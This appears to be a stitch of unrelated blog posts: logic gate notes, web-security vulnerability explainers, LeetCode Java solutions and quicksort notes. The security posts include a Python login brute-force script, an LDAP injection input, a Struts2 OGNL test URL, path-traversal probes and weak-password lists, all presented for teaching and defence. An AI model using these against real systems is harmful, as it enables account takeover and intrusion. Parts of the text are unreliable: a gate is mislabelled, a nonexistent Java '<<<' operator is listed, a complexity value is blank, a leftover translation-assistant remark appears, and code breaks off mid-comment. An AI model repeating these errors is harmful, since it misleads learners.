Logic Gate Truth Tables & Definitions

Logic Gate Truth Tables

Java Code

!A // NOT
A&B // AND
~(A&B) // NAND
A|B // OR
~(A|B) // XOR
A^B // XOR
~(A^B) // XNOR
~A // Inverts 0 to 1 and 1 to 0

A << 1  // Shift A's bits 1 position to the left. (Empty positions are filled with 0)
A >> 1  // Shift A's bits 1 position to the right. (Empty positions are filled with the leftmost sign bit's value)
A <<< 1 // Shift A's bits 1 position to the left. (Empty positions are filled with 0)
A >>> 1 // Shift A's bits 1 position to the right. (Empty positions are filled with 0)

NOT gate

AND gate

NAND gate

OR gate

NOR gate

XOR gate

XNOR gate

Cybersecurity: What is Automated Attacks?

Definition

Automated attacks refer to vulnerabilities where attackers use computer programs or scripts to automatically target a system.

Vulnerability Points

• Login page
• Post submission
• Social media sharing page

Vulnerability Verification Methods

• Repeatedly attempting requests without any issues

Attack Methods

Attack Scenarios

Common scenarios for automated attacks can include:

• Using automated tools to repeatedly attempt logins.
• The attacker captures the passwords of users with weak passwords.

Occurrence Process

Attack Example

The following example is a Python code designed to repeatedly attempt logins on a login site that has only a 4-digit password, written in PHP.

import requests

url = '<http://example.com/login_check.php>'
username = 'test'
password = '1234'

# Create a session
session = requests.Session()

# Send POST requests
for i in range(1, 9999):
    data = {
        'user_id': username,
        'user_pass': i
    }

    response = requests.post(url, data=data)

    # Check the response
    if response.status_code == 200:
        print('Request Password: ', i)
        print('Response Content:', response.text)
    else:
        print('Request failed. Status code:', response.status_code)

Countermeasures

1. Strong Authentication and Encryption: Prevent malicious access by using robust CAPTCHA authentication methods and encryption.
2. Network Security: Monitor network traffic and detect malicious activities using firewalls, intrusion detection systems, and other security measures.
3. Web Application Security: Adhere to secure coding practices to prevent vulnerabilities in web applications and implement appropriate web application firewalls.

Leetcode 112. Path Sum Java Solution

Problem

LeetCode - The World's Leading Online Programming Learning Platform

Problem Solving Approach

• The objective of this problem is to check whether there is a path in the given binary tree from the root to a leaf node whose sum equals the given targetSum.
• Therefore, this code recursively explores paths in the given binary tree and checks if the path sum matches the targetSum.

Algorithm

1. Recursion:
   • The hasPathSum function is called recursively.
   • This function subtracts the value of the current node from targetSum and uses the result as the new targetSum.
2. Base Case:
   • At the start of the recursive call, it checks if the current node is null to determine if it has reached the end of the tree.
   • If it's null, the current path is not valid, so it returns false.
3. Leaf Node Check:
   • It checks if the current node is a leaf node, meaning it has no children.
   • If the current node is a leaf node, it checks if targetSum is equal to 0.
   • If targetSum is 0, it means that the current path's sum matches the targetSum, so it returns true.
4. Recursive Calls for Left and Right Subtrees:
   • If the current node is not a leaf node, it makes recursive calls to the left and right subtrees using the modified targetSum value.
5. Return Result:
   • If either the left or right subtree returns true, it means there exists a path in the current path that satisfies the targetSum, so it returns true.
   • Otherwise, it returns false.

Recursive Function Implementation Table

• Goal: https://leetcode.com/problems/path-sum/

• Base Case (Termination Conditions):

  if root == null
  return false
  
  if left == null && right == null <- after subtracting root.val from sum
  return sum == 0
  

• Is the previous step's result needed?: Yes

• Problem Splitting (Divide the Problem):

  sum -= root.val
  

• Combining Results:

  boolean left
  boolean right
  return left || right
  

• Recursive Calls and Changes Before Moving to the Next Step (Recursive Call):

  sum -= root.val
  

Github Link

https://github.com/eunhanlee/LeetCode_112_PathSum_Solution.git

Time Complexity: O(n), Space Complexity: O(h)

class Solution {

    /**
     * Checks if there is a path from the root to a leaf node in the given binary tree
     * with a sum equal to the target sum.
     *
     * @param root      The root node of the binary tree.
     * @param targetSum The target sum to be achieved.
     * @return Returns `true` if a path exists, `false` otherwise.
     */
    public boolean hasPathSum(TreeNode root, int targetSum) {
        if (root == null) {
            return false;
        }

        // Subtract the value of the current node from the target sum.
        targetSum -= root.val;

        // Check if the current node is a leaf node and if the target sum is 0.
        if (root.left == null && root.right == null) {
            return targetSum == 0;
        }

        // Recursively check the left and right subtrees.
        Boolean rightNode = hasPathSum(root.right, targetSum);
        Boolean leftNode = hasPathSum(root.left, targetSum);

        // Return `true` if there is a valid path in either the left or right subtree.
        return rightNode || leftNode;
    }
}

Time Complexity

• The time complexity of this code is O(n) because it visits all nodes in the tree exactly once, where n is the number of nodes in the tree.

Space Complexity

• Due to the recursive function calls, a call stack is built up, but it only requires space up to the height of the tree, so the space complexity is O(h), where h is the height of the tree.

What is Session Prediction?

Definition

Session Prediction is a security vulnerability where an attacker predicts session identifiers to hijack or forge another user's session. Session identifiers are typically used in the form of cookies, tokens, or session IDs to maintain a user's authentication state and manage sessions.

Vulnerability Points of Occurrence

• All pages where sessions are applied.

Vulnerability Verification Methods

• When there is a consistent algorithm for session issuance that makes prediction easy:
  • Verify if sessions are issued anew during login.
  • Check if sessions are related to different IDs.
  • Verify if sessions are related to time.
  • Ensure sessions do not remain unchanged.
  • Check encryption methods (e.g., MD5 not used, DES, SHA, etc.).

Attack Methods

Attack Scenario

1. Attackers use various techniques to predict session identifiers.
2. Attackers who have predicted session identifiers hijack or forge the user's session to bypass authentication.
3. Attackers use session identifiers to impersonate users, abusing the original user's privileges or performing illegal actions.

Occurrence Process

Detailed Process Explanation

1. The user requests authentication from the application.
2. The application issues a session to the user.
3. The attacker confirms that the session is the same as the user's ID.
4. The attacker uses various attack techniques (e.g., XSS) to obtain the session identifier.
5. The user exposes the session identifier to the attacker.
6. The attacker uses the acquired session identifier to send requests to the application.
7. The application processes the attacker's requests.

Mitigation Strategies

• Use strong session identifier generation algorithms that are difficult to predict and have high randomness.
• Strengthen session management and maintenance methods. Limit the validity period of sessions and renew them when necessary.
• Implement secure session identifier transmission methods. Use encrypted connections like HTTPS or require additional authentication.

What is Insufficient Session Expiration?

Definition

Insufficient Session Expiration is a security vulnerability where session duration is not adequately configured, allowing sessions to remain active for an extended period. This can enable attackers to exploit stolen sessions or allow unauthorized access even after a user has logged out.

Vulnerable Points of Occurrence

• All pages that require a session.

Vulnerability Verification Method

• Accessing the "My Page" while logged out to check if the session persists.

Attack Method

Attack Scenario

1. The attacker identifies that sessions are persisting for an extended period due to insufficient session expiration settings.
2. Even after a user logs out, if the session remains valid, the attacker can exploit the stolen session to access the application while impersonating the user.
3. The attacker can then perform illegal actions or abuse the user's privileges.

Event Flow

Detailed Process Explanation

1. The user initiates a logout request to the application.
2. The application handles the logout request and expires the session.
3. However, due to insufficient session expiration settings, the session remains valid.
4. The attacker utilizes the stolen session to send requests to the application.
5. The application processes the attacker's request.

Mitigation Measures

• Implement proper session expiration settings. Set session validity periods and automatically expire sessions based on user inactivity.
• Handle session expiration appropriately when a user logs out.

What is Session Fixation?

Definition

Session Fixation is one of the vulnerabilities that can occur in web application security. This vulnerability refers to a situation where an attacker gains access to an authenticated session by controlling the user's session identifier.

Points of Vulnerability

• Pages that issue sessions
• Pages that require a session (after authorization)

Vulnerability Verification Methods

• If the issued session remains the same even after logging out and logging back in.
• If the session before logging in and the session after logging in are the same.
• If the session is not reissued (no "set cookie" in the response).

Attack Method

Attack Scenario

1. The attacker logs in and creates a session identifier.
2. The attacker forcefully delivers this session identifier to the user.
3. The user logs in to the web application and starts a session.
4. Since the session is already the same, the attacker can access the authenticated session by refreshing.

Attack Scenario Process

Detailed Explanation

1. The attacker sends an authentication request to the web application.
2. The web application generates a session identifier for authentication.
3. The session identifier is delivered to the user and is used when starting a session.
4. The attacker forcefully delivers a previously generated malicious session identifier to the user.
5. When the user starts a session, they unknowingly use the malicious session identifier provided by the attacker.
6. The web application performs authentication verification and considers the malicious session identifier as valid.
7. The attacker gains access to the authenticated session using the malicious session identifier.

Countermeasures

1. Randomness of Session Identifiers: Session identifiers should be generated randomly and should be difficult to predict.
2. Changing Session Identifiers: Session identifiers should be changed whenever a user is authenticated or gains authorization.
3. Secure Session Management: Session identifiers should be securely stored. If using cookies, set the security attributes 'Secure' and 'HttpOnly' to ensure secure transmission and protection against client-side scripts.
4. Session Monitoring and Logging: Monitor and log session activity in the system to detect and respond to suspicious activities.

Cybersecurity: What Is Weak String Strength?

Definition

Weak string strength is a measure of how vulnerable a string, such as a password or authentication information, is.

Vulnerability Points

• Login Page

Vulnerability Assessment Methods

• Length, simplicity
• Usernames: admin, administrator, manager, guest, test, scott, tomcat, root, user, operator, anonymous, etc.
• Passwords: Abcd, aaaa, 1234, 1111, test, password, public, blank password, password identical to the ID, password123, qwerty, 123456789, etc.
• Hackers often attempt to hack using lists of weak or commonly used usernames and passwords. Therefore, it is essential to be cautious of this.

Attack Methods

Attack Scenario

1. The attacker possesses a list of usernames and passwords with weak string strength.
2. The attacker uses this list to make indiscriminate login attempts.
3. If even one attempt succeeds, they can use it to steal personal information or create additional victims using methods like XSS.

Countermeasures

1. Length and Complexity Requirements: Set requirements for password length and diversity to encourage the use of strong passwords.
2. Strengthen Password Policies: Guide users to create secure passwords and set password change intervals.
3. Require Two-Factor Authentication: Implement additional security by using email, SMS, or apps for two-factor authentication.
4. Account Lockout Policies: Set policies for locking accounts after a certain number of incorrect login attempts.
5. Improve Education and Awareness: Provide users with education on strong password usage and security.

Cybersecurity: What Is Insufficient Authentication?

Definition

Insufficient Authentication is a security vulnerability that refers to a situation in which important functions or resources can be accessed within an application or system without the proper authentication process.

List of Vulnerable Points

• Pages that require authorization to access.
• My Account (User Profile)
• Discussion Boards or Forums

Methods to Verify Vulnerabilities

• Verify if reauthentication is required when accessing the user profile.
• Check if login is possible even with incorrect credentials.
• Identify cases where authentication relies solely on the username.

Attack Methods

Attack Scenario

1. The attacker explores vulnerabilities that allow them to bypass or disable the authentication process.
2. They may bypass authentication using weak passwords or unauthorized access to a user's session.
3. Exploiting the vulnerabilities, the attacker gains unauthorized access to important functions or resources.

Process Flow

Mitigation Strategies

• Implement and strengthen appropriate authentication procedures. Verify user identities and perform thorough authorization checks.
• Establish secure password policies and enforce them. Use encryption for storing passwords and employ secure authentication mechanisms.
• Carefully manage sessions and implement appropriate timeouts and logout functionality.
• Enhance access controls for protected functions or resources to prevent unauthorized users from gaining access.

Cybersecurity: What is Weak Password Recovery?

Definition

Weak Password Recovery is a security vulnerability where the function to recover a forgotten password is poorly implemented, allowing malicious attackers to guess or gain access through brute force attacks.

Vulnerability Points

• Password reset pages

Vulnerability Testing Methods

• Verify if the password is exposed during the password reset process.
• Check if the password, when sent to a phone number or email, can still be delivered even if it's tampered with.

Attack Methods

Attack Scenario

1. The attacker exploits the feature provided for users to recover forgotten passwords.
2. Using weak security procedures or vulnerable reset links/tokens, the attacker bypasses the password reset process or sets arbitrary passwords.
3. The attacker gains access to the user's account through guessing or brute force attacks.

Occurrence Process

Detailed Explanation

1. The user requests a password recovery from the application.
2. The application provides a reset link or token to the user.
3. The user completes the reset procedure and changes the password.
4. The attacker requests password recovery with weak security procedures.
5. The application allows the attacker's request and permits password reset.

Countermeasures

• Implement robust password reset procedures. Verify email addresses and require additional trustworthy authentication steps.
• Limit the validity period of temporary passwords and enforce the necessity of setting a new password.
• Strengthen security questions and answers. Avoid using weak security questions and ensure answers are not easily predictable.
• Implement email verification securely. Use ownership verification for email addresses or additional security authentication methods.

What is Directory Indexing

Definition

Directory indexing vulnerability is one of the security vulnerabilities that can occur in web applications. This vulnerability can occur when a web application dynamically generates directory paths without validating user input.

It is a vulnerability where a specific directory automatically displays a directory listing when the initial page (index.html, home.html, default.asp, etc.) does not exist in that directory.

Vulnerability Occurrence Points

• All pages

Vulnerability Verification Methods

• When example.com/path1/path2/page is given, test example.com/path1/path2/.
• When example.com/path1/path2/page is given, test example.com/path1/../../../.
• When example.com/ is given, test example.com/index.php.
• When example.com/ is given, test example.com/.
• In the case of php+apache, default generated files include:
  • */var/www/html/**index.php
  • /var/www/html/.htaccess
  • */etc/php/**php.ini
  • */var/log/apache2/**error_log
  • */var/log/apache2/**access_log

Attack Method

Attack Scenario

1. The attacker investigates the path in the address bar.
2. The attacker confirms that user input affects the directory path.
3. The attacker attempts to exploit by using the directory path to access the web server's file system or call executable files.

Occurrence Process

Detailed Process Explanation

1. The web application dynamically generates directory paths based on user input.
2. Due to the vulnerability, the directory path is exposed to malicious users.
3. The attacker uses the exposed directory path to attempt to access the web server's file system or call executable files.

Countermeasures

1. Validate User Input: Perform validation on values received from users to restrict them to allowed characters or formats. For example, define a set of allowed characters or limit the length of input values.
2. Use Whitelist Filtering: Process user input using whitelist filtering to only allow directory names that are explicitly permitted, rejecting other characters or path separators.
3. Use Path Mapping: Instead of dynamically generating directory paths based on user input, use a directory mapping table to map input values to actual directory paths. This way, user input doesn't need to be directly applied to directory paths.

What is Information Disclosure

Definition

Unnecessary information exposure, also known as Information Disclosure, refers to security vulnerabilities where information that should not be exposed to users or systems in web services is disclosed to external parties.

Vulnerability Points

• Error pages, HTTP request and response pages

Vulnerability Validation Methods

• For error pages, HTTP request, and response headers, check if version information is visible using Burp Suite.
• Verify if important information commented in web pages is exposed in the web page source.
• Check if excessive information is exposed in error messages or error pages.
• Confirm if encoded important information can be decoded.

Attack Methods

Attack Scenarios

1. Information exposure using error messages: Attackers extract sensitive information such as debug information or paths from error messages.
2. Information exposure using XSS (Cross-Site Scripting): Attackers trick users into accessing the password change page, inadvertently revealing their previous password, which the attacker then captures.

Occurrence Process

Countermeasures

1. Configure not to return detailed error messages with debug and exception information.
2. Implement error handling mechanisms to prevent exposing exception information to users.
3. Take measures not to store sensitive information in log files.
4. Restrict access to the web service's directory structure and file lists.
5. Apply security measures to web application configuration files and database connection information.

What is Malicious Content

Definition

Malicious content refers to malicious content designed to harm or steal a user's system or data, originating from an untrusted source.

Vulnerability Points

1. Bulletin boards
2. Comments
3. File libraries

Vulnerability Verification Methods

Check if the following vulnerabilities exist in bulletin boards, comments, etc.:

1. XSS (Cross-Site Scripting)
2. File upload
3. CSRF (Cross-Site Request Forgery)
4. SSRF (Server-Side Request Forgery)

Attack Methods

Attack Scenarios

1. The attacker creates malicious files or malicious code.
2. The malicious files are distributed through websites, email attachments, or other channels.
3. Victims download malicious files, click on malicious links, or open malicious email attachments.
4. When the malicious content is executed, the attacker damages or steals the victim's system or data.

Occurrence Process

Countermeasures

1. Install and Update Security Software: Install security software such as antivirus and firewalls, and keep them regularly updated to detect and block the latest malicious content.
2. Effective Detection of Malicious Content: Develop methods to quickly detect and block malicious files, links, and emails.
3. User Education and Awareness: Provide users with education on the characteristics of malicious content and how to prevent damage. Encourage them to be cautious with suspicious emails, links, and files.

LeetCode 2413. Smallest Even Multiple Java Solution

Problem

Smallest Even Multiple - LeetCode

Solution Approach

• The term "multiple of 2" indicates that the number must be even.
• The term "multiple of n" indicates that the number must be a multiple of n.
• This problem is about finding the smallest even multiple among the multiples of n.
• Initially, I attempted an algorithm where I iterated by incrementing n and returned it if it was even. However, I soon realized that the second multiple of n is always an even number.
• Therefore, the most efficient algorithm is as follows:
  • Check if n is even.
  • If n is even, return n.
  • If n is not even, then the next multiple will always be even.
  • Therefore, return n * 2.

Github Link

https://github.com/eunhanlee/LeetCode_2413_SmallestEvenMultiple_Solution.git

Time Complexity: O(1), Space Complexity: O(1)

public class Solution {
    /**
     * Finds the smallest even multiple of the given number.
     *
     * @param n The number for which the smallest even multiple needs to be found.
     * @return The smallest even multiple of the given number.
     */
    public int smallestEvenMultiple(int n) {
        if (n % 2 == 0) {
            return n;
        } else {
            return n * 2;
        }
    }
}

What is LDAP Injection

Definition

LDAP (Lightweight Directory Access Protocol) injection is a security vulnerability that occurs when user-input data is used in LDAP queries without proper validation or sanitization. This can lead to unauthorized access or manipulation of data within an LDAP directory.

List of Vulnerable Points

• Anywhere user input is used for authentication
• Login identifiers, passwords

Vulnerability Verification Method

• Verify if manipulated LDAP queries are inserted and executed in user input values.

USERNAME>(&)

LDAP Injection Cheatsheet

LDAP (Lightweight Directory Access Protocol)

LDAP is a protocol used to implement network directory services, used to store and retrieve directory information such as users, groups, and devices.

What is LDAP(Lightweight Directory Access Protocol)

Network Directory Services

Network directory services are systems designed to centrally manage information such as users, resources, and services in a computer network. The primary purpose is to efficiently perform user identification, authentication, authorization management, resource retrieval, and access.

LDAP, LDAP Server, WAS, DB Structure

Attack Method

Attack Scenario

1. The attacker manipulates malicious LDAP queries and passes them to a vulnerable application.
2. The application uses user input for LDAP queries without proper validation.
3. The manipulated LDAP query is executed, resulting in unauthorized access or data manipulation within the LDAP directory.

Attack Process

Detailed Process Explanation

1. The attacker provides malicious input, passing it to the application.
2. The application executes the vulnerable LDAP query without proper user input validation.
3. The vulnerable LDAP query is sent to and executed by the LDAP server.
4. The LDAP server processes the query and returns the result to the application.
5. The application displays the result to the user or utilizes it for other purposes.

Mitigation Strategies

• Use prepared statements.
• Implement whitelist-based filtering to allow only alphanumeric characters (a-z, A-Z, 0-9).
• Minimize access permissions to the LDAP server, restricting application accounts to the least necessary privileges.
• Apply rulesets to web firewalls to filter LDAP-related special characters.
• Target filtering:

LDAP Injection Cheatsheet

Basic LDAP Search Query

LDAP (Lightweight Directory Access Protocol) is commonly used to retrieve specific information from directory services (e.g., Active Directory). The following is an example of an LDAP query for basic searches:

(&(attribute1=value1)(attribute2=value2))

Let's break down the components of the query:

• The & symbol is the logical "AND" operator that combines multiple conditions.
• attribute1 and attribute2 are the names of the attributes you want to search within the directory (e.g., "cn" for common name, "mail" for email).
• value1 and value2 are the values you're looking for within those attributes.

You can customize attributes and values to match specific requirements. For example, to search for a user with the common name "John Doe" and the email address "john.doe@example.com," the query would be:

(&(cn=John Doe)(mail=john.doe@example.com))

Thus, for logging in, you can use the following query:

(&(cn=USERNAME)(userPassword=PASSWORD))

Basic LDAP Injection Query

(&) in an LDAP filter doesn't only mean the "AND" operator; it's also a syntactic element that represents an empty filter. You can use this to inject USERNAME>(&) into the identifier field. This will lead to the execution of the query as follows:

(&(cn=USERNAME>(&))(userPassword=PASSWORD))

Depending on the (&), the latter filter becomes unconstrained, and all entries are returned. This naturally results in a successful login.

What is LDAP(Lightweight Directory Access Protocol)

Definition

LDAP (Lightweight Directory Access Protocol) is a protocol that provides directory services as part of the internet protocol stack.

LDAP Structure

LDAP inherently follows a tree structure and stores data with specific conditions. Each node is referred to as an entry, and classified information is stored in each entry.

Entry Name Table

Web Application Structure Using LDAP

Purpose

LDAP provides a way to store and retrieve information about users, groups, devices, and more using a hierarchical data structure.

Advantages

• Efficient data retrieval is possible due to the hierarchical structure of directory services.
• Offers features for authentication and access control, enhancing security.
• Widely known standard protocol with support for various platforms and languages.

Disadvantages

• LDAP can require complex setup and management.
• It might not be suitable for handling large amounts of data.
• It's more specialized for retrieval and storage rather than insertion or modification.

Example

import ldap

# Connect to LDAP server
conn = ldap.initialize('ldap://ldap.example.com')

# Binding (Authentication)
conn.simple_bind_s('username', 'password')

# Search
base_dn = 'ou=users,dc=example,dc=com'
filter = '(& (cn=john))'
attributes = ['cn', 'email']
result = conn.search_s(base_dn, ldap.SCOPE_SUBTREE, filter, attributes)

# Print results
for dn, entry in result:
    cn = entry['cn'][0].decode('utf-8')
    email = entry['email'][0].decode('utf-8')
    print(f'CN: {cn}, Email: {email}')

# Unbind (Disconnect)
conn.unbind()

In the Python code, the ldap module is used to connect to the LDAP server, perform binding (authentication), search, handle results, and disconnect. The ldap.initialize function establishes a connection to the LDAP server, conn.simple_bind_s performs authentication, and conn.search_s is used for searching. The results are then processed and printed.

Operating System Commands by Http Request

Definition

Operating system command execution vulnerabilities are weaknesses that allow malicious users to execute malicious code or induce abnormal behavior within a system using the commands of the operating system.

List of Vulnerability Trigger Points

• All pages
• When receiving an HTTP request and the operating system executes a command based on the parameter value

Vulnerability Verification Methods

• Insert publicly known operating system command execution code into parameter values passed to the web application and verify if the command is executed.

• Apache Struts 2 RCE (Remote Code Execution) vulnerability (publicly known operating system command execution code) reference site: https://cwiki.apache.org/confluence/display/WW/Security+Bulletins

• The code below utilizes a vulnerability in the Struts 2 framework. If the web page is vulnerable, the result of 3*4, which is 12, will be displayed on the page.

  <http://host/struts2-blank/example/X.action?action:%25{3\\\\*4}>
  

Attack Methods

Attack Scenario

1. The attacker generates malicious input to be sent to the system.
2. In vulnerable sections, the input is interpreted as an operating system command or directly passed to a command execution function.
3. This results in the execution of malicious code or abnormal system behavior.

Process of Occurrence

Detailed Process Explanation

1. The attacker generates malicious input.
2. In vulnerable sections, insufficient input validation or incorrect interpretation of external input occurs as an operating system command.
3. This leads to the execution of malicious code within the system or abnormal system behavior.

Mitigation Measures

• Header information restriction: Configure HTTP responses to avoid revealing version information in a few response pages.
• HTTP entity: Safely handle command execution by passing user input as arguments to operating system commands.
• Input validation and filtering: Transform or restrict user input into a trusted format to prevent malicious code injection.
• Permission restriction: Minimize the impact of attacks by limiting the scope of executable commands or restricting the permissions required for command execution.
• Use of appropriate command execution functions: Utilize secure operating system command execution functions or libraries that perform security checks.

What are Authentication and Authorization

Definitions

Authentication

The process of verifying a user's identity, confirming that the person is who they claim to be.

Authentication is the process of confirming the identity of a user or system. This involves the user providing evidence of their claimed identity or the system verifying the identity of the entity attempting to access a resource. Authentication is achieved when a user provides valid credentials (such as a username and password) to confirm their identity, often used during the login process. It is the first step required for a user to gain access to a system.

Authorization

The act of granting permissions to authorized individuals.

Authorization is the process of verifying whether an authenticated entity has the necessary permissions to access specific resources or perform certain actions. It occurs after authentication and involves determining what actions an authenticated entity is allowed to perform. For instance, in a web application, authorization might involve checking a user's permissions before allowing access to a specific page.

Vulnerable Points List

• All pages requiring authentication or authorization

Vulnerability Testing Methods

• Checking if access is possible to posts that are not accessible by simply changing page numbers (changing the HTTP address)
• Verifying if client-side redirection occurs (this might allow response manipulation)
• Reviewing comment sections for potential vulnerabilities
• Checking if JavaScript files (.js) are used to implement redirection
• Testing parameter manipulation

Attack Methods

Authentication Bypass Process

Details of Authentication Bypass Process

1. Page 1 is accessible to anyone.
2. Page 2 requires login. An unsuccessful login attempt is made by the attacker.
3. If the login is successful on Page 2, the user is redirected to Page 3, granting access to the forum.
4. However, Page 3 does not check for successful authentication.
5. The attacker accesses Page 3 without going through Page 2.
6. The server provides Page 3 content to the attacker.

Authorization Bypass Process

Details of Authorization Bypass Process

1. The attacker requests "user profile" from the web server.
2. The web server provides the "user profile" to the attacker.
3. The attacker then requests "admin profile" from the web server.
4. The web server denies the request, indicating incorrect cookie parameters.
5. The attacker speculates that the server checks the cookie parameters.
6. The attacker sends a tampered request for "user profile" to the web server.
7. The web server provides the "admin profile" to the attacker.

Mitigation Strategies

• Ultimate defense: Server-side verification through sessions
  • Server-side verification through sessions is essential
  • Client-side code should focus on user convenience features only
• Additional measures:
  • Implement strong password policies: Enforce length, complexity, and change intervals
  • Introduce Two-Factor Authentication (2FA): Add additional authentication factors beyond passwords
• Apply the principle of least privilege: Grant users only the minimum permissions required

Feel free to use this translated content for your blog! If you have any further questions or need additional assistance, feel free to ask.

What are Dynamic Analysis and Static Analysis

Definition

Methods of Analyzing Programs

Dynamic Analysis

Verifying through multiple executions

Dynamic analysis is a method of analyzing the behavior of software during its execution.

When software is running, dynamic analysis tools are used to monitor and analyze the program's behavior, state, data flow, and more.

Pros

By analyzing the actual behavior of running software, it's possible to identify issues that occur in real environments.

Cons

Analyzing the behavior of running software can impact performance.

It's limited to the execution environment.

It can require more time and resources compared to static analysis.

Static Analysis

Continuously reading the code visually

Static analysis is a method of analyzing source code in a state where the software isn't being executed.

Using static analysis tools, the structure of the code, compliance with rules, potential bugs, security vulnerabilities, and more are identified and analyzed.

Pros

Since it analyzes the source code, it's not limited to the execution environment. It can identify code defects and security vulnerabilities beforehand.

Cons

It's heavily influenced by the skills of the analyzer.

LeetCode 75. Sort Colors Java Solution

Problem

Sort Colors - LeetCode

Solution Approach

• This problem asks whether you can implement a sorting algorithm without using built-in sorting functions or methods.
• Since the input consists of only 0, 1, and 2, it is possible to solve it using a logic-based algorithm.
• Algorithm:
  • Iterate through all elements and count the occurrences of 0s, 1s, and 2s.
  • Fill the array with 0s, then 1s, and finally 2s based on their counts.
• The "Follow up" asks about the one-pass algorithm known as the Dutch National Flag algorithm, which specializes in sorting 0s and 1s.
• Alternatively, you can implement the Quick Sort algorithm.

References

What is Dutch National Flag algorithm

What is Quick Sort

Github Link

https://github.com/eunhanlee/LeetCode_75_SortColors_Solution.git

Logic Algorithm Time Complexity: O(n), Space Complexity: O(1)

/**
 * The Solution class provides a method to sort an array containing only 0, 1, and 2.
 */
public class Solution {

    /**
     * Sorts the given array using the counting technique. The array should contain only 0, 1, and 2.
     *
     * @param nums The array to be sorted.
     */
    public void sortColors(int[] nums) {
        int Zero = 0, One = 0, Two = 0; // Variables to count the occurrences of 0s, 1s, and 2s
        int idx = 0; // Index to track the position in the array

        // Count occurrences of 0s, 1s, and 2s
        for (int num : nums) {
            if (num == 0) Zero++;
            if (num == 1) One++;
            if (num == 2) Two++;
        }

        // Fill the array with 0s, then 1s, and finally 2s based on their counts
        for (int i = 0; i < Zero; i++) {
            nums[idx] = 0;
            idx++;
        }
        for (int i = 0; i < One; i++) {
            nums[idx] = 1;
            idx++;
        }
        for (int i = 0; i < Two; i++) {
            nums[idx] = 2;
            idx++;
        }
    }
}

Dutch National Flag Algorithm Time Complexity: O(n), Space Complexity: O(1)

public class Solution {
    /**
     * Sorts the given array containing only 0, 1, and 2 using the Dutch National Flag algorithm.
     *
     * @param nums The array to be sorted.
     */
    public void sortColors(int[] nums) {
        int low = 0;  // Pointer to 0
        int mid = 0;  // Pointer to 1
        int high = nums.length - 1;  // Pointer to 2

        while (mid <= high) {
            if (nums[mid] == 0) {
                // If the current element is 0, swap it with the element at the low pointer.
                swap(nums, low, mid);
                low++;  // Increment low pointer
                mid++;  // Increment mid pointer (since the swapped element is 1)
            } else if (nums[mid] == 1) {
                // If the current element is 1, move the mid pointer forward.
                mid++;
            } else if (nums[mid] == 2) {
                // If the current element is 2, swap it with the element at the high pointer.
                swap(nums, mid, high);
                high--;  // Decrement high pointer
                // Note: Here, the mid pointer is not incremented yet as the swapped element's value is uncertain.
            }
        }
    }

    /**
     * Swaps two elements in the array.
     *
     * @param nums The array containing the elements.
     * @param i    Index of the first element to be swapped.
     * @param j    Index of the second element to be swapped.
     */
    private void swap(int[] nums, int i, int j) {
        int temp = nums[i];
        nums[i] = nums[j];
        nums[j] = temp;
    }
}

Quick Sort Time Complexity: O(n log n), Space Complexity: O()

public class Solution3 {
    /**
     * Sorts the given array using the Quick Sort algorithm.
     *
     * @param nums The array to be sorted.
     */
    public void sortColors(int[] nums) {
        quickSort(nums);
    }

    private static void quickSort(int[] input) {
        quickSortRecur(input, 0, input.length - 1);
    }

    /**
     * Recursively implements Quick Sort using the Lomuto partition scheme.
     * pivot: Rightmost element
     * Starting point for selected value (left): 0
     * Starting point for comparison value (right): 0
     *
     * @param input The array to be sorted.
     * @param left  Starting index of the array to be partitioned.
     * @param right Ending index of the array to be partitioned.
     */
    private static void quickSortRecur(int[] input, int left, int right) {
        // Quick Sort termination condition: array length is 1 or less
        if (left >= right) {
            return;
        }

        // Find the partition point using the Lomuto partition scheme
        int pivotPos = partition(input, left, right);

        // Recursively sort the left partition
        quickSortRecur(input, left, pivotPos - 1);
        // Recursively sort the right partition
        quickSortRecur(input, pivotPos + 1, right);
    }

    /**
     * Swaps the positions of two elements in an array.
     *
     * @param input The array containing the elements.
     * @param a     Index of the first element.
     * @param b     Index of the second element.
     */
    private static void swap(int[] input, int a, int b) {
        int temp = input[a];
        input[a] = input[b];
        input[b] = temp;
    }

    /**
     * Uses the Lomuto partition scheme to partition an array and returns the position of the pivot.
     *
     * @param input The array to be partitioned.
     * @param left  Starting index of the array to be partitioned.
     * @param right Ending index of the array to be partitioned.
     * @return The position of the pivot.

What is Quick Sort

Definition

One of the fundamental algorithms for sorting in ascending order.

• Most important and widely used in any programming language.
• O(n log n) complexity, but worst-case scenario can be O(n^2).
• To minimize the worst-case scenario, choosing pivot positions randomly can help.
• However, if O(n^2) is absolutely not acceptable, another sorting algorithm should be used.
• Unstable sort.
• Divide and Conquer algorithm.
• Easier to implement using recursion.

Structure

Algorithm

Recursively traverses by dividing into two parts based on the pivot.

1. Values smaller than the pivot are classified on the left, and larger values on the right. However, this process is carried out without changing the length.
2. Choose the pivot point. Typically, the rightmost value or the leftmost value is chosen (depends on Lomuto or Hoare partition scheme).
3. The first value is considered the "selected value."
4. If the checking value is smaller than the pivot, swap the selected value and the checking value, and move the selected value to the right.
5. If the checking value is greater than the pivot, move the checking value to the right.
6. Once the checking value reaches the pivot, swap the selected value and the pivot.
7. Repeat steps 2 to 6 recursively.

Choosing the pivot value

1. Lomuto Partition Scheme
   • Pivot: Rightmost value
   • Selected value (i) starting point: 0
   • Checking value (j) starting point: 0
2. Hoare Partition Scheme
   • Pivot: Leftmost value
   • Selected value (i) starting point: 1
   • Checking value (j) starting point: Rightmost value
3. Randomly selecting

Java Code - Lomuto Partition Scheme

   public static void quickSort(int[] input) {
        quickSortRecur(input, 0, input.length - 1);
    }

    // Quick sort implementation using the Lomuto partition scheme
    public static void quickSortRecur(int[] input, int left, int right) {

        // Exit condition for quick sort
        // Using right >= left would sort in descending order (9,8,7)
        // Currently sorted in ascending order (7,8,9)
        if (left >= right) {
            return;
        }

        // Partition around the pivot and return its position
        int pivotPos = partition(input, left, right);

        // Recursively sort the left part
        quickSortRecur(input, left, pivotPos - 1);
        // Recursively sort the right part
        quickSortRecur(input, pivotPos + 1, right);

    }

    public static void swap(int[] input, int a, int b) {
        int temp = input[a];
        input[a] = input[b];
        input[b] = temp;
    }

    public static int partition(int[] input, int left, int right) {
        int pivot = input[right];

        int i = (left - 1);
        for (int j = left; j < right; ++j) {
            if (input[j] < pivot) {
                ++i;
                swap(input, i, j);
            }
        }
        swap(input, (i + 1), right);
        return i + 1;
    }

Java Code - Hoare Partition Scheme

 public static void quickSort(int[] input) {
        quickSortRecur(input, 0, input.length - 1);
    }

    // Quick sort implementation using the Hoare partition scheme
